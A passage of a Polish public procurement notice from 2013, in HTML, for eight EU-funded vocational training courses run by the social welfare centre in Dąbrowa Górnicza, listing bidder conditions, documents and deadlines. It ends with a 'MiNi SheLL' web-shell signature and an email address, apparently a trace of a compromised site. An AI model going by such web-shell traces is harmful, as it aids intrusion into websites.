zastrzeżeniem, że dany uczestnik szkolenia rozpoczyna i kończy każde zajęcia szkoleniowe na terenie miasta Dąbrowa Górnicza. 8. Zaplecze techniczne: 1) Szkolenie praktyczne zostanie przeprowadzone z wykorzystaniem pojazdów w ilości zapewniającej prawidłowe wykonanie usługi, jednak w ilości nie mniejszej niż 3 sprawne pojazdy (dopuszczone do ruchu, przystosowane do nauki jazdy, spełniające wymagania określone w przepisach w sprawie warunków technicznych pojazdów oraz niezbędnego wyposażenia w zakresie prawa jazdy kat. B.) 2) Wykonawca musi dysponować dostępem do placu manewrowego. 9. Dokumentacja kursu: 1) Wykonawca winien przekazać Zamawiającemu przed rozpoczęciem realizacji zamówienia: -program szkolenia, -harmonogram zajęć teoretycznych. 2) Wykonawca winien przekazywać Zamawiającemu w trakcie realizacji zamówienia: miesięczne harmonogramy zajęć praktycznych 3) Wykonawca winien przekazać Zamawiającemu wraz z fakturą VAT za zrealizowanie przedmiotu zamówienia: -kopie kart zajęć teoretycznych i praktycznych, zawierających tematykę zajęć teoretycznych, tematykę zajęć praktycznych, terminy ich realizacji oraz wymiar godzin. IX Wymagania dodatkowe wspólne dla wszystkich zadań w zakresie nieokreślonym  w rozdziałach  III.1 - III.8. zostały uszczegółowione III.9 SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada wpis do rejestru  instytucji szkoleniowych  prowadzonych przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy  zgodnie z Rozporządzeniem  Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004 r. Nr 236, poz. 2365 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku posiadania wiedzy i doświadczenia w zakresie realizacji przedmiotu zamówienia, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy, w tym okresie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 2 usługi (2 odrębne dla każdego  zadania) polegające na organizacji szkolenia o tematyce zgodnej rodzajowo z tematyką tego zadania, na które składa ofertę łącznie dla co najmniej ilości osób określonych jn:dla zadania 1 -co najmniej 2 usługi  w zakresie: Kurs komputerowy  przygotowujący w zakresie ECDL START i ECDL -e-Citizen wraz z egzaminem  uprawniającym do Europejskiego Certyfikatu  Umiejętności komputerowych w zakresie  ECDL START i ECDL e-Citizen dla liczby uczestników nie mniejszej niż 15 osób dla zadania 2- co najmniej 2 usługi w zakresie: Opiekun osób starszych i niepełnosprawnych dla  liczby uczestników nie mniejszej niż 10 osób dla zadania 3 - co najmniej 2 usługi  w zakresie: Kasjer z obsługą kasy fiskalnej oraz fakturowaniem komputerowym   dla  liczby uczestników  nie mniejszej niż  5 osób dla zadania 4 - co najmniej 2 usługi  w zakresie: Operator koparko - ładowarki  wszystkie typy klasa III dla  liczby uczestników  nie mniejszej niż 5 osób dla zadania 5 - co najmniej 2 usługi  w zakresie: Gospodarka magazynowa z obsługą wózka jezdniowego, komputera w zakresie  programów  magazynowych, podstaw fakturowania komputerowego  oraz praktycznymi  aspektami  realizacji zasad GHP-GMP dla liczby uczestników  nie mniejszej niż 10 osób dla zadania 6 - co najmniej 2 usługi  w zakresie: Kurs spawania metodą  MAG (135) dla  liczby uczestników  nie mniejszej niż 4 osób dla zadania 7- co najmniej 2 usługi  w zakresie: Palacz kotłów  wodnych i parowych  opalanych węglem, koksem, olejem, gazem oraz obsługą  wymienników ciepła dla  liczby uczestników  nie mniejszej niż 5 osób dla zadania 8 - co najmniej 2 usługi  w zakresie: Kurs prawo jazdy kategoria B dla grupy uczestników  nie mniejszej niż  25 osób z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dowodu  potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie (dla każdego zadania oddzielnie)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego  warunku w tym zakresie.
Zamawiający żąda złożenia  oświadczenia  o spełnieniu warunków określonych w art. 22 ust 1 ustawy Pzp i jego ocena  odbędzie się według formuły : spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca  wykaże dysponowanie osobami zdolnymi do wykonania zamówienia jn: Dla zadania 1 - Kurs komputerowy  przygotowujący w zakresie  ECDL START i ECDL e-Citizen wraz z egzaminem  uprawniającym  do Europejskiego  Certyfikatu  Umiejętności komputerowych w zakresie  ECDL START i ECDL e-Citizen-wymagane min. 1 osoba z wykształceniem wyższym informatycznym lub  posiadająca inne uprawnienia  do prowadzenia  kursu określonego w niniejszym zadaniu. Dla zadania 2 - Opiekun osób starszych i  niepełnosprawnych z modułem języka niemieckiego (w stopniu podstawowym) - wymagane min. 1 osoba z wykształceniem wyższym psycholog, terapeuta, pedagogiczny lub innym uprawniający do prowadzenia kursu w zakresie opieki nad osobami starszymi i niepełnosprawnymi i 1 osoba z wykształceniem wyższym  germanistycznym do szkolenia z zakresu języka niemieckiego w stopniu podstawowym. Dla zadania 3 - Kasjer z obsługą kasy fiskalnej oraz fakturowaniem komputerowym - wymagane min. 1 osoba posiadająca wykształcenie lub uprawnienia do prowadzenia kursu  w zakresie określonym w niniejszym zadaniu Dla zadania 4 - Operator koparko - ładowarki wszystkie typy klasa III wymagane min. 1 osoba posiadająca średnie lub wyższe wykształcenie techniczne i uprawnienia do prowadzenia kursu w zakresie określonym w niniejszym zadaniu Dla zadania 5 - Gospodarka magazynowa z obsługą wózka jezdniowego, komputera w zakresie  programów magazynowych, podstaw fakturowania komputerowego oraz praktycznymi  aspektami realizacji zasad GHP-GMP - wymagane min. 1 osoba posiadająca średnie lub wyższe wykształcenie techniczne i uprawnienia  do prowadzenia kursu w zakresie obsługi wózka jezdniowego i minimum 1 osoba posiadająca wykształcenie lub uprawnienia do prowadzenia kursu w pozostałym zakresie określonym w niniejszym zadaniu. Dla zadania 6 - Kurs spawania metodą  MAG (135) - wymagane min. 1 osoba posiadająca średnie lub wyższe wykształcenie techniczne i uprawnienia  do prowadzenia kursu w zakresie określonym w niniejszym zadaniu. Dla zadania 7 - Palacz kotłów wodnych i parowych opalanych węglem, koksem, olejem, gazem oraz obsługą wymienników ciepła wymagane min. 1 osoba posiadająca średnie lub wyższe wykształcenie techniczne i uprawnienia  do prowadzenia kursu w zakresie określonym w niniejszym zadaniu  Dla zadania 8 - Kurs prawo jazdy kategoria B wymagane min. 1 osoby posiadające uprawnienia do prowadzenia kursów prawa jazdy w zakresie teoretycznym i 4 osoby z uprawnieniami Instruktora Prawa jazdy kategorii B. Spełnienie  warunku nastąpi, poprzez złożenie oświadczenia oraz wykazu osób, którymi dysponuje Wykonawca zdolnych  do realizacji  zamówienia posiadającymi wymagane uprawnienia do wykonania usługi określonej w postępowaniu j.w. jeżeli ustawy nakładają taki obowiązek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnego  warunku w tym zakresie.
Zamawiający żąda złożenia  oświadczenia  o spełnieniu warunków określonych w art. 22 ust 1 ustawy Pzp i jego ocena  odbędzie się według formuły : spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty -Załącznik Nr 1 do SIWZ- wskazana data podpisania. 2. Pełnomocnictwo do reprezentacji Wykonawcy (jeżeli zostało ustanowione) lub do reprezentowania wykonawców wspólnie ubiegających się  o zamówienie (dotyczy  również spółki cywilnej), pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i być złożone w oryginale lub kopii poświadczonej przez notariusza. 3. Dokument - zobowiązanie innych podmiotów , pisemne do oddania  do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania  z nich  przy wykonywaniu zamówienia określający stosunek łączący Wykonawcę  z innymi podmiotami gwarantujący rzeczywisty dostęp do  ich zasobów, wymagany w przypadku, gdy Wykonawca polega na ich zasobach na zasadach określonych  w art. 26 ust. 2b ustawy, dotyczące w szczególności: a) dane pozwalające identyfikację stron, b) zakres dostępnych wykonawcy zasobów innego podmiotu, c) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia, d) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, e) zakresu i okresu udziału innego podmiotu przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy wprowadzonych aneksem w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach: a. W zakresie zmiany terminu wykonania zamówienia na skutek  wystąpienia siły wyższej, czyli wydarzenia nieprzewidywalnego w chwili podpisywania umowy lub inne okoliczności niezależne od Zamawiającego, w tym takich , których Zamawiający  przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć np. nietypowe dla klimatu polskiego zjawiska bądź zdarzenia atmosferyczne lub inne. b. Zmiany  powszechnie obowiązujących przepisów prawa  w zakresie  mającym  wpływ  na realizacje zamówienia: -zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi  lub warunkami organizacyjnymi  bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy-zmianie mogą ulec termin realizacji umowy  oraz terminy wynikające z oferty. c. gdy zaistnieje inna niemożliwa do przewidzenia   w chwili zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna , za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości  należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia-Zamawiający dopuszcza w takich okolicznościach zmiany umowy, w szczególności terminu realizacji zamówienia. d. Zmiany ilości osób (uczestników szkolenia) na podstawie obiektywnych przesłanek nie dających się przewidzieć ze względu na charakter grupy docelowej. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. 3 Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, zawierającego uzasadnienie faktyczne i prawne zmiany, pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Skibińskiego 1
41 - 300 Dąbrowa Górnicza
III piętro, pok. 54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2013 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Skibińskiego 1
41 - 300 Dąbrowa Górnicza
III piętro, pok. 54.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.07.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt INTEGRA - program integracji zawodowej i społecznej osób w Dąbrowie Górniczej oraz Projekt Bliżej domu- model wychodzenia z bezdomności. Projekty współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, realizowane przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs komputerowy przygotowujący w zakresie ECDL START i ECDL e- Citizen wraz z egzaminem uprawniającym do Europejskiego Certyfikatu Umiejętności Komputerowych w zakresie ECDL START i ECDL e-Citizen.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.1. SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opiekun osób starszych i niepełnosprawnych z modułem języka niemieckiego (w stopniu podstawowym).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.2 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kasjer z obsługą kasy fiskalnej oraz fakturowaniem komputerowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.3 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator koparko - ładowarki wszystkie typy klasa III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.4 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Gospodarka magazynowa z obsługą wózka jezdniowego, komputera w zakresie programów magazynowych, podstaw fakturowania komputerowego oraz praktycznymi
aspektami realizacji zasad GHP-GMP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.5 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs spawania metodą MAG (135).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.6 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Palacz kotłów wodnych i parowych opalanych węglem, koksem, olejem, gazem oraz obsługą wymienników ciepła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.7 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs prawo jazdy kategoria B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w ogólnym przedmiocie zamówienia oraz w rozdz. III.8 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com